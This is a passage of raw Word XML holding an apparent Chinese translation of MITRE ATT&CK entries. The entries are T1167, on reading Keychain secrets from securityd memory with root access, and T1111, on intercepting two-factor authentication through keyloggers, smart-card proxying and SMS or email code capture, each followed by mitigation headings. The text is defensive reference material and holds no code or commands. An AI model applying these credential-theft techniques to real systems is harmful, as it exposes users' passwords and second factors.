          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示攻击者恶意使用密钥或证书进行远程身份认证</w:t>
      </w:r>
      <w:r w:rsidRPr="003433BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F10222" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Securityd</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="6F842896" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DEBCAFC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> T1167</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D71052" w14:textId="3DCBFE34" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A99ED6A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E35A3E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> root</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ADD5E5B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008357C6" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1979C4EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008357C6">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008357C6">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C15EBB1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FFFC00A" w14:textId="685B4842" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>El Capitan</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前的</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS X</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，具有</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问权限的用户可以读取已登录用户的明文</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现允许缓存这些凭据，以便不会反复提示用户输入密码。</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:t>securityd</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取用户的登录密码，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PBKDF2</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对其进行加密，并将此主密钥存储在内存中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还使用一组密钥和算法来加密用户的密码，但是一旦找到主密钥，攻击者只需要迭代其他值来解锁最终密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01771834" w14:textId="604FFD93" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果攻击者可以获得</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问权限（允许他们读取</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>securityd</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的内存），那么他们可以扫描内存以在相对较少的尝试中找到正确的密钥序列来解密用户的登录</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了用户，</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WiFi</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，邮件，浏览器，证书，安全备注等所有明文密码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E82AD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00CF59B2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFD9BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术无法通过预防性控制轻松缓解，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原因在于</w:t>
      </w:r>
      <w:r w:rsidRPr="005873F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它基于滥用系统功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10FAFB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>双因子认证拦截</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="3DDB1EC5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1279486D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> T1111</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51DC3DE3" w14:textId="2354DDBF" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="093F0177" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5127D718" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>智能卡代理：使用智能卡进行单因素或多因素身份验证以访问网络资源。带插卡的附加智能卡读卡器；带外一次性代码：访问设备，服务或通信以拦截一次性代码；硬件令牌：访问生成一次性代码的种子和算法。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00739BA6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E26E04E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控，进程监控，内核驱动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64780898" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t>: John Lambert, Microsoft Threat Intelligence Center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BEEA920" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00563665">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00563665">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1A384602" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE2776A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00740FD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议使用双因素或多因素身份验证，并提供比单独的用户名和密码更高级别的安全性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00740FD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但组织应了解可用于拦截和绕过这些安全机制的技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00740FD6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以将身份验证机制（例如智能卡）作为目标，以获取对系统，服务和网络资源的访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C22A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果智能卡用于双因素身份验证（</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2FA</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），则需要使用键盘记录器来获取正常使用期间与智能卡关联的密码。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用插入的卡和访问智能卡密码，攻击者可以使用受感染的系统连接到网络资源，以使用插入的硬件令牌代理身份验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A5853" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可以使用键盘记录器来类似地定位其他硬件令牌，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RSA SecurID</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>捕获令牌输入（包括用户的个人识别码）可以提供临时访问（即重放一次性密码直到下一个值翻转）以及可能使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可靠地预测未来的认证值（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋予其</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对算法和用于生成附加临时代码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>种子值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的访问</w:t>
      </w:r>
      <w:r w:rsidRPr="0069372F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B6B6E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2FA</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的其他方法可能被拦截并被对手用来进行身份验证。</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常通过带外通信（电子邮件，</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMS</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）发送一次性代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果设备和</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或服务不安全，则可能容易受到拦截。</w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00725B4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然主要针对网络犯罪分子，但这些认证机制已成为高级参与者的目标。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C95176E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="7477"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00563665" w14:paraId="2DE6146B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3EB0A0D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="19174CB2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00563665" w14:paraId="16E8CA14" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EAA18D9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId168" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00563665">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户培训</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E881DB8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00563665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
